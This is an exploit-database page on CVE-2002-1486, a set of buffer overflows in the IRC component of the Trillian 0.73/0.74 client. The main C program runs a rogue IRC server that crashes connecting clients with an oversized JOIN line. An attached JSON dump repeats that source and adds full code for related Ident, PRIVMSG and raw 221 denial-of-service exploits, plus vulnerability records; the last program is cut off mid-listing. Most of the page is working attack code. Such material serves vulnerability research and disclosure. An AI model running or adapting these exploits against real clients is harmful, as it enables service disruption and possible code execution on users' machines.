Search...

Trillian 0.73/0.74 IRC JOIN Buffer Overflow Vulnerability

2002-09-20T00:00:00

ID EDB-ID:21813
Type exploitdb
Reporter Lance Fitz-Herbert
Modified 2002-09-20T00:00:00

Description

Trillian 0.73/0.74 IRC JOIN Buffer Overflow Vulnerability. CVE-2002-1486. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/5765/info

The Trillian IRC module does not sufficiently check bounds on JOIN commands. A malicious IRC server may potentially exploit this condition to cause a denial of service or execute arbitrary code with the privileges of the client.

This issue was reported for Trillian versions 0.73 and 0.74. Earlier versions may also be affected. 

/* Trillian-Join.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Join Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.

*/

#include &lt;windows.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;winsock.h&gt;

SOCKET s;

#define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"

int main() {

        SOCKET TempSock = SOCKET_ERROR;
        WSADATA WsaDat;
        SOCKADDR_IN Sockaddr;
        int nRet;
        char payload[300];

        printf("\nTrillian Join Flaw\n");
        printf("----------------------\n");
        printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
        printf("Tested On Version .74 and .73\nListening On Port 6667 For
Connections\n\n");

        if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
                printf("ERROR: WSA Initialization failed.");
                return 0;
        }


        /* Create Socket */
        s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == INVALID_SOCKET) {
                printf("ERROR: Could Not Create Socket. Exiting\n");
                WSACleanup();
                return 0;
        }

        Sockaddr.sin_port = htons(6667);
        Sockaddr.sin_family = AF_INET;
        Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
        if (nRet == SOCKET_ERROR) {
                printf("ERROR Binding Socket");
                WSACleanup();
                return 0;
        }

        /* Make Socket Listen */
        if (listen(s, 10) == SOCKET_ERROR) {
                printf("ERROR: Couldnt Make Listening Socket\n");
                WSACleanup();
                return 0;
        }

        while (TempSock == SOCKET_ERROR) {
              TempSock = accept(s, NULL, NULL);
        }

        printf("Client Connected, Sending Payload\n");

        send(TempSock,MSG1,strlen(MSG1),0);
        memset(payload,'A',300);
        send(TempSock,payload,strlen(payload),0);
        send(TempSock,"\n",1,0);

        printf("Exiting\n");
        sleep(100);
        WSACleanup();
        return 0;
}

JSON Vulners Source

Initial Source

{"id": "EDB-ID:21813", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Trillian 0.73/0.74 IRC JOIN Buffer Overflow Vulnerability", "description": "Trillian 0.73/0.74 IRC JOIN Buffer Overflow Vulnerability. CVE-2002-1486. Dos exploit for windows platform", "published": "2002-09-20T00:00:00", "modified": "2002-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/21813/", "reporter": "Lance Fitz-Herbert", "references": [], "cvelist": ["CVE-2002-1486"], "lastseen": "2016-02-02T17:19:59", "viewCount": 3, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-02-02T17:19:59", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-1486"]}, {"type": "osvdb", "idList": ["OSVDB:10791", "OSVDB:10797", "OSVDB:10794", "OSVDB:10795", "OSVDB:10796"]}, {"type": "exploitdb", "idList": ["EDB-ID:21810", "EDB-ID:21823", "EDB-ID:21804", "EDB-ID:21816"]}], "modified": "2016-02-02T17:19:59", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/21813/", "sourceData": "source: http://www.securityfocus.com/bid/5765/info\r\n\r\nThe Trillian IRC module does not sufficiently check bounds on JOIN commands. A malicious IRC server may potentially exploit this condition to cause a denial of service or execute arbitrary code with the privileges of the client.\r\n\r\nThis issue was reported for Trillian versions 0.73 and 0.74. Earlier versions may also be affected. \r\n\r\n/* Trillian-Join.c\r\n Author: Lance Fitz-Herbert\r\n Contact: IRC: Phrizer, DALnet - #KORP\r\n ICQ: 23549284\r\n\r\n Exploits the Trillian Join Flaw.\r\n Tested On Version .74 and .73\r\n Compiles with Borland 5.5 Commandline Tools.\r\n\r\n This Example Will Just DoS The Trillian Client,\r\n not particularly useful, just proves the flaw exists.\r\n\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <winsock.h>\r\n\r\nSOCKET s;\r\n\r\n#define MSG1 \":server 001 target :target\\n:target!ident@address JOIN :\"\r\n\r\nint main() {\r\n\r\n SOCKET TempSock = SOCKET_ERROR;\r\n WSADATA WsaDat;\r\n SOCKADDR_IN Sockaddr;\r\n int nRet;\r\n char payload[300];\r\n\r\n printf(\"\\nTrillian Join Flaw\\n\");\r\n printf(\"----------------------\\n\");\r\n printf(\"Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\\n\");\r\n printf(\"Tested On Version .74 and .73\\nListening On Port 6667 For\r\nConnections\\n\\n\");\r\n\r\n if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {\r\n printf(\"ERROR: WSA Initialization failed.\");\r\n return 0;\r\n }\r\n\r\n\r\n /* Create Socket */\r\n s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if (s == INVALID_SOCKET) {\r\n printf(\"ERROR: Could Not Create Socket. Exiting\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n Sockaddr.sin_port = htons(6667);\r\n Sockaddr.sin_family = AF_INET;\r\n Sockaddr.sin_addr.s_addr = INADDR_ANY;\r\n\r\n\r\n nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));\r\n if (nRet == SOCKET_ERROR) {\r\n printf(\"ERROR Binding Socket\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n /* Make Socket Listen */\r\n if (listen(s, 10) == SOCKET_ERROR) {\r\n printf(\"ERROR: Couldnt Make Listening Socket\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n while (TempSock == SOCKET_ERROR) {\r\n TempSock = accept(s, NULL, NULL);\r\n }\r\n\r\n printf(\"Client Connected, Sending Payload\\n\");\r\n\r\n send(TempSock,MSG1,strlen(MSG1),0);\r\n memset(payload,'A',300);\r\n send(TempSock,payload,strlen(payload),0);\r\n send(TempSock,\"\\n\",1,0);\r\n\r\n printf(\"Exiting\\n\");\r\n sleep(100);\r\n WSACleanup();\r\n return 0;\r\n}\r\n", "osvdbidlist": ["10796"]}

{"cve": [{"lastseen": "2020-10-03T11:37:00", "description": "Multiple buffer overflows in the IRC component of Trillian 0.73 and 0.74 allows remote malicious IRC servers to cause a denial of service and possibly execute arbitrary code via (1) a large response from the server, (2) a JOIN with a long channel name, (3) a long \"raw 221\" message, (4) a PRIVMSG with a long nickname, or (5) a long response from an IDENT server.", "edition": 3, "cvss3": {}, "published": "2003-04-02T05:00:00", "title": "CVE-2002-1486", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1486"], "modified": "2008-09-05T20:30:00", "cpe": ["cpe:/a:cerulean_studios:trillian:0.725", "cpe:/a:cerulean_studios:trillian:0.73", "cpe:/a:cerulean_studios:trillian:0.74"], "id": "CVE-2002-1486", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1486", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cerulean_studios:trillian:0.74:*:*:*:*:*:*:*", "cpe:2.3:a:cerulean_studios:trillian:0.73:*:*:*:*:*:*:*", "cpe:2.3:a:cerulean_studios:trillian:0.725:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-1486"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of a raw 221 IRC message resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code resulting in a loss of integrity, and/or availability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of a raw 221 IRC message resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code resulting in a loss of integrity, and/or availability.\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-09/0266.html\nISS X-Force ID: 10151\n[CVE-2002-1486](https://vulners.com/cve/CVE-2002-1486)\nBugtraq ID: 5769\n", "modified": "2002-09-21T22:38:24", "published": "2002-09-21T22:38:24", "href": "https://vulners.com/osvdb/OSVDB:10797", "id": "OSVDB:10797", "type": "osvdb", "title": "Trillian IRC Component raw 221 Mode Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-1486"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of a data block from an IDENT server resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or the execution of arbitrary code resulting in a loss of integrity, and/or availability.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Disable the Ident server\n## Short Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of a data block from an IDENT server resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or the execution of arbitrary code resulting in a loss of integrity, and/or availability.\n## Manual Testing Notes\nSending 418+ bytes to the Identd server (TCP 113) can cause the Trillian client to crash\n## References:\nVendor URL: http://ceruleanstudios.com/\nSecurity Tracker: 1005236\nMail List Post: http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0139.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-09/0224.html\nKeyword: TCP 113\nISS X-Force ID: 10118\n[CVE-2002-1486](https://vulners.com/cve/CVE-2002-1486)\nBugtraq ID: 5733\n", "modified": "2002-09-14T22:39:49", "published": "2002-09-14T22:39:49", "href": "https://vulners.com/osvdb/OSVDB:10794", "id": "OSVDB:10794", "type": "osvdb", "title": "Trillian IRC Component IDENT Server Remote Overflow DoS", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-1486"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of the \"Channel\" variable in the Join command resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code resulting in a loss of integrity, and/or availability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of the \"Channel\" variable in the Join command resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code resulting in a loss of integrity, and/or availability.\n## References:\nVendor URL: http://ceruleanstudios.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-09/0258.html\nISS X-Force ID: 10150\n[CVE-2002-1486](https://vulners.com/cve/CVE-2002-1486)\nBugtraq ID: 5765\n", "modified": "2002-09-20T22:37:28", "published": "2002-09-20T22:37:28", "href": "https://vulners.com/osvdb/OSVDB:10796", "id": "OSVDB:10796", "type": "osvdb", "title": "Trillian IRC Component JOIN Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-1486"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Trillian. Trillian fails to validate IRC channel name s resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Trillian. Trillian fails to validate IRC channel name s resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-07/0489.html\nISS X-Force ID: 9761\n[CVE-2002-1486](https://vulners.com/cve/CVE-2002-1486)\nBugtraq ID: 5388\n", "modified": "2002-08-01T23:05:57", "published": "2002-08-01T23:05:57", "href": "https://vulners.com/osvdb/OSVDB:10791", "id": "OSVDB:10791", "type": "osvdb", "title": "Trillian IRC Component Channel Name Format String", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-1486"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of the \"Sender\" variable in the Privmsg command resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or the execution of arbitrary code resulting in a loss of integrity, and/or availability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of the \"Sender\" variable in the Privmsg command resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or the execution of arbitrary code resulting in a loss of integrity, and/or availability.\n## Manual Testing Notes\nThe exploit occurs when the \"Sender\" variable is larger than 206 bytes.\n## References:\nVendor URL: http://ceruleanstudios.com/\nMail List Post: http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0140.html\nISS X-Force ID: 10143\nGeneric Exploit URL: http://packetstormsecurity.org/0209-exploits/Trillian-Privmsg.c\n[CVE-2002-1486](https://vulners.com/cve/CVE-2002-1486)\nBugtraq ID: 5755\n", "modified": "2002-09-19T22:40:30", "published": "2002-09-19T22:40:30", "href": "https://vulners.com/osvdb/OSVDB:10795", "id": "OSVDB:10795", "type": "osvdb", "title": "Trillian IRC Component PRIVMSG Command Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T17:18:44", "description": "Trillian 0.6351/0.7x Identd Buffer Overflow Vulnerability. CVE-2002-1486. Remote exploit for windows platform", "published": "2002-09-18T00:00:00", "type": "exploitdb", "title": "Trillian 0.6351/0.7x Identd Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1486"], "modified": "2002-09-18T00:00:00", "id": "EDB-ID:21804", "href": "https://www.exploit-db.com/exploits/21804/", "sourceData": "source: http://www.securityfocus.com/bid/5733/info\r\n\r\nTrillian ships with an ident server to facilitate connections to IRC servers that require an ident response before allowing access. A buffer overflow condition exists in the Trillian ident server, which may potentially be exploited to cause a denial of service or execute arbitrary code.\r\n\r\nWhen the ident server receives a malformed request that is 418 bytes or more in length, the client crashes and memory is corrupted. It may be possible for an attacker to exploit the resulting memory corruption to execute arbitrary instructions with the privileges of the ident server.\r\n\r\n/* Trillian-Ident.c\r\n Author: Lance Fitz-Herbert\r\n Contact: IRC: Phrizer, DALnet - #KORP\r\n ICQ: 23549284\r\n\r\n Exploits the Trillian Ident Flaw.\r\n Tested On Version .74 and .73\r\n Compiles with Borland 5.5\r\n This Example Will Just DoS The Trillian Client.\r\n\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\nchar payload[500];\r\nint main(int argc, char * argv[]) {\r\n int iret;\r\n struct hostent *host;\r\n SOCKET sockhandle;\r\n SOCKADDR_IN address;\r\n WSADATA wsdata;\r\n\r\n if (argc<2) {\r\n printf(\"\\nTrillian Ident DoS\\n\");\r\n printf(\"----------------------\\n\");\r\n printf(\"Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\\n\");\r\n printf(\"Tested On Version .74 and .73\\n\\n\");\r\n printf(\"Usage: trillian-ident <address>\");\r\n return 0;\r\n }\r\n\r\n WSAStartup(MAKEWORD(1,1),&wsdata);\r\n printf(\"Making Socket Now...\\n\");\r\n sockhandle = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);\r\n\r\n if (sockhandle == SOCKET_ERROR) {\r\n printf(\"Error Creating Socket\\n\");\r\n WSACleanup();\r\n return 1;\r\n }\r\n\r\n printf(\"Socket Created\\n\");\r\n\r\n address.sin_family = AF_INET;\r\n address.sin_port = htons(113);\r\n address.sin_addr.s_addr = inet_addr(argv[1]);\r\n\r\n\r\n if (address.sin_addr.s_addr == INADDR_NONE) {\r\n host = NULL;\r\n printf(\"Trying To Resolve Host\\n\");\r\n host = gethostbyname(argv[1]);\r\n if (host == NULL) {\r\n printf(\"Uknown Host: %s\\n\",argv[1]);\r\n WSACleanup();\r\n return 1;\r\n }\r\n memcpy(&address.sin_addr, host->h_addr_list[0],host->h_length);\r\n }\r\n\r\n\r\n\r\n printf(\"Connecting To Server...\\n\");\r\n iret = connect(sockhandle, (struct sockaddr *) &address, sizeof(address));\r\n\r\n if (iret == SOCKET_ERROR) {\r\n printf(\"Couldnt Connect\\n\");\r\n WSACleanup();\r\n return 1;\r\n }\r\n\r\n printf(\"Connected to %s!\\nSending Payload\\n\",argv[1]);\r\n memset(payload,'A',500);\r\n send(sockhandle,payload,strlen(payload),0);\r\n Sleep(100);\r\n WSACleanup();\r\n return 0;\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21804/"}, {"lastseen": "2016-02-02T17:19:32", "description": "Trillian 0.73/0.74 IRC PRIVMSG Buffer Overflow Vulnerability. CVE-2002-1486. Remote exploit for windows platform", "published": "2002-09-19T00:00:00", "type": "exploitdb", "title": "Trillian 0.73/0.74 - IRC PRIVMSG Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1486"], "modified": "2002-09-19T00:00:00", "id": "EDB-ID:21810", "href": "https://www.exploit-db.com/exploits/21810/", "sourceData": "source: http://www.securityfocus.com/bid/5755/info\r\n\r\nTrillian is an instant messaging client that supports a number of protocols (including IRC, ICQ, MSN). It is available for Microsoft Windows systems.\r\n\r\nA buffer overflow has been discovered in Trillian version .73 and .74. When processing a PRIVMSG command with an overly large sender name, a buffer overflow will occur resulting in memory corruption and a denial of service.\r\n\r\nAlthough not yet confirmed, because memory can be overwritten, it may be possible for arbitrary attacker-supplied code to be executed with the privileges of the client.\r\n\r\n/* Trillian-Privmsg.c\r\n Author: Lance Fitz-Herbert\r\n Contact: IRC: Phrizer, DALnet - #KORP\r\n ICQ: 23549284\r\n\r\n Exploits the Trillian Privmsg Flaw.\r\n Tested On Version .74 and .73\r\n Compiles with Borland 5.5 Commandline Tools.\r\n\r\n This Example Will Just DoS The Trillian Client,\r\n not particularly useful, just proves the flaw exists.\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <winsock.h>\r\n\r\nSOCKET s;\r\n\r\n#define MSG1 \":server 001 target :target\\n:\"\r\n#define MSG2 \"!ident@address PRIVMSG target :You are the weakest link, \r\nGoodbye.\\n\"\r\n\r\nint main() {\r\n\r\n SOCKET TempSock = SOCKET_ERROR;\r\n WSADATA WsaDat;\r\n SOCKADDR_IN Sockaddr;\r\n int nRet;\r\n char payload[300];\r\n\r\n printf(\"\\nTrillian Privmsg Flaw\\n\");\r\n printf(\"----------------------\\n\");\r\n printf(\"Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\\n\");\r\n printf(\"Tested On Version .74 and .73\\nListening On Port 6667 For \r\nConnections\\n\\n\");\r\n\r\n if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {\r\n printf(\"ERROR: WSA Initialization failed.\");\r\n return 0;\r\n }\r\n\r\n\r\n /* Create Socket */\r\n s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if (s == INVALID_SOCKET) {\r\n printf(\"ERROR: Could Not Create Socket. Exiting\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n Sockaddr.sin_port = htons(6667);\r\n Sockaddr.sin_family = AF_INET;\r\n Sockaddr.sin_addr.s_addr = INADDR_ANY;\r\n\r\n\r\n nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));\r\n if (nRet == SOCKET_ERROR) {\r\n printf(\"ERROR Binding Socket\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n /* Make Socket Listen */\r\n if (listen(s, 10) == SOCKET_ERROR) {\r\n printf(\"ERROR: Couldnt Make Listening Socket\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n while (TempSock == SOCKET_ERROR) {\r\n TempSock = accept(s, NULL, NULL);\r\n }\r\n\r\n printf(\"Client Connected, Sending Payload\\n\");\r\n\r\n send(TempSock,MSG1,strlen(MSG1),0);\r\n memset(payload,'A',300);\r\n send(TempSock,payload,strlen(payload),0);\r\n send(TempSock,MSG2,strlen(MSG2),0);\r\n\r\n printf(\"Exiting\\n\");\r\n sleep(100);\r\n WSACleanup();\r\n return 0;\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21810/"}, {"lastseen": "2016-02-02T17:20:27", "description": "Trillian 0.725/0.73/0.74 IRC User Mode Numeric Remote Buffer Overflow Vulnerability. CVE-2002-1486. Dos exploit for windows platform", "published": "2002-09-21T00:00:00", "type": "exploitdb", "title": "Trillian 0.725/0.73/0.74 IRC User Mode Numeric Remote Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1486"], "modified": "2002-09-21T00:00:00", "id": "EDB-ID:21816", "href": "https://www.exploit-db.com/exploits/21816/", "sourceData": "source: http://www.securityfocus.com/bid/5769/info\r\n\r\nTrillian is an instant messaging client that supports a number of protocols (including IRC, ICQ, MSN). It is available for Microsoft Windows systems. \r\n\r\nIt has been reported that Trillian does not perform adequate bounds checking when receiving IRC raw user mode messages. When a Trillian client receives an instruction from a server for a raw user mode change containing 251 or more bytes of data, a buffer overflow occurs. This could result in denial of service, or the execution of arbitrary attacker supplied instructions.\r\n\r\n/* Trillian-221.c\r\n Author: Lance Fitz-Herbert\r\n Contact: IRC: Phrizer, DALnet - #KORP\r\n ICQ: 23549284\r\n\r\n Exploits the Trillian \"Raw 221\" Flaw.\r\n Tested On Version .74 and .73\r\n Compiles with Borland 5.5 Commandline Tools.\r\n\r\n This Example Will Just DoS The Trillian Client,\r\n not particularly useful, just proves the flaw exists.\r\n\r\n Greets: AnAh, Hooves.\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <winsock.h>\r\n\r\nSOCKET s;\r\n\r\n#define MSG1 \":server 221 target \"\r\n\r\nint main() {\r\n\r\n SOCKET TempSock = SOCKET_ERROR;\r\n WSADATA WsaDat;\r\n SOCKADDR_IN Sockaddr;\r\n int nRet;\r\n char payload[257];\r\n\r\n printf(\"\\nTrillian Raw 221 Flaw\\n\");\r\n printf(\"---------------------\\n\");\r\n printf(\"Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\\n\");\r\n printf(\"Tested On Version .74 and .73\\nListening On Port 6667 For \r\nConnections\\n\\n\");\r\n\r\n if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {\r\n printf(\"ERROR: WSA Initialization failed.\");\r\n return 0;\r\n }\r\n\r\n\r\n /* Create Socket */\r\n s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if (s == INVALID_SOCKET) {\r\n printf(\"ERROR: Could Not Create Socket. Exiting\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n Sockaddr.sin_port = htons(6667);\r\n Sockaddr.sin_family = AF_INET;\r\n Sockaddr.sin_addr.s_addr = INADDR_ANY;\r\n\r\n\r\n nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));\r\n if (nRet == SOCKET_ERROR) {\r\n printf(\"ERROR Binding Socket\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n /* Make Socket Listen */\r\n if (listen(s, 10) == SOCKET_ERROR) {\r\n printf(\"ERROR: Couldnt Make Listening Socket\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n while (TempSock == SOCKET_ERROR) {\r\n TempSock = accept(s, NULL, NULL);\r\n }\r\n\r\n printf(\"Client Connected, Sending Payload\\n\");\r\n\r\n send(TempSock,MSG1,strlen(MSG1),0);\r\n memset(payload,'A',257);\r\n send(TempSock,payload,strlen(payload),0);\r\n send(TempSock,\"\\n\",1,0);\r\n\r\n printf(\"Exiting\\n\");\r\n sleep(100);\r\n WSACleanup();\r\n return 0;\r\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21816/"}, {"lastseen": "2016-02-02T17:21:26", "description": "Trillian 0.74 IRC Oversized Data Block Buffer Overflow Vulnerability. CVE-2002-1486. Dos exploit for windows platform", "published": "2002-09-22T00:00:00", "type": "exploitdb", "title": "Trillian 0.74 IRC Oversized Data Block Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1486"], "modified": "2002-09-22T00:00:00", "id": "EDB-ID:21823", "href": "https://www.exploit-db.com/exploits/21823/", "sourceData": "source: http://www.securityfocus.com/bid/5777/info\r\n\r\nA vulnerability has been reported for Trillian. Reportedly, Trillian is prone to a buffer overflow condition when it receives blocks of data that are larger than 4095 bytes. \r\n\r\nA malicious server may exploit this condition to cause a denial of service in the client. This may also potentially be exploited to execute arbitrary code, though this possibility has not been confirmed.\r\n\r\n/* Trillian-Dos.c\r\n Author: Lance Fitz-Herbert\r\n Contact: IRC: Phrizer, DALnet - #KORP\r\n ICQ: 23549284\r\n\r\n Exploits Multiple Trillian DoS Flaws:\r\n Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333,\r\n352, 367\r\n Part Flaw\r\n Data length flaw.\r\n\r\n Tested On Version .74\r\n Compiles with Borland 5.5 Commandline Tools.\r\n\r\n These Examples Will Just DoS The Trillian Client,\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <winsock.h>\r\n\r\nSOCKET s;\r\n\r\n#define SERVER \":server \"\r\n#define PART \":nick!ident@address PART\\n\"\r\n\r\nint main(int argc, char *argv[]) {\r\n\t\t SOCKET TempSock = SOCKET_ERROR;\r\n\t\t WSADATA WsaDat;\r\n\t\t SOCKADDR_IN Sockaddr;\r\n\t\t int nRet;\r\n\t\t char payload[4096];\r\n\t\t if (argc < 2) {\r\n\t\t \t\t usage();\r\n\t\t \t\t return 1;\r\n\t\t }\r\n\t\t if ((!strcmp(argv[1],\"raw\")) && (argc < 3) || (strcmp(argv[1],\"raw\")) &&\r\n(strcmp(argv[1],\"part\")) && (strcmp(argv[1],\"data\"))) {\r\n\t\t \t\t usage();\r\n\t\t \t\t return 1;\r\n\t\t }\r\n\r\n\t\t printf(\"Listening on port 6667 for connections....\\n\");\r\n\t\t if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {\r\n \t\t printf(\"ERROR: WSA Initialization failed.\");\r\n\t\t \t\t return 0;\r\n\t\t }\r\n\r\n\r\n\t\t /* Create Socket */\r\n\t\t s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n\t\t if (s == INVALID_SOCKET) {\r\n\t\t \t\t printf(\"ERROR: Could Not Create Socket. Exiting\\n\");\r\n\t\t \t\t WSACleanup();\r\n\t\t \t\t return 0;\r\n\t\t }\r\n\r\n\t\t Sockaddr.sin_port = htons(6667);\r\n\t\t Sockaddr.sin_family = AF_INET;\r\n\t\t Sockaddr.sin_addr.s_addr = INADDR_ANY;\r\n\r\n\r\n nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));\r\n\t\t if (nRet == SOCKET_ERROR) {\r\n\t\t \t\t printf(\"ERROR Binding Socket\");\r\n\t\t \t\t WSACleanup();\r\n\t\t \t\t return 0;\r\n\t\t }\r\n\r\n\t\t /* Make Socket Listen */\r\n\t\t if (listen(s, 10) == SOCKET_ERROR) {\r\n\t\t \t\t printf(\"ERROR: Couldnt Make Listening Socket\\n\");\r\n\t\t \t\t WSACleanup();\r\n\t\t \t\t return 0;\r\n\t\t 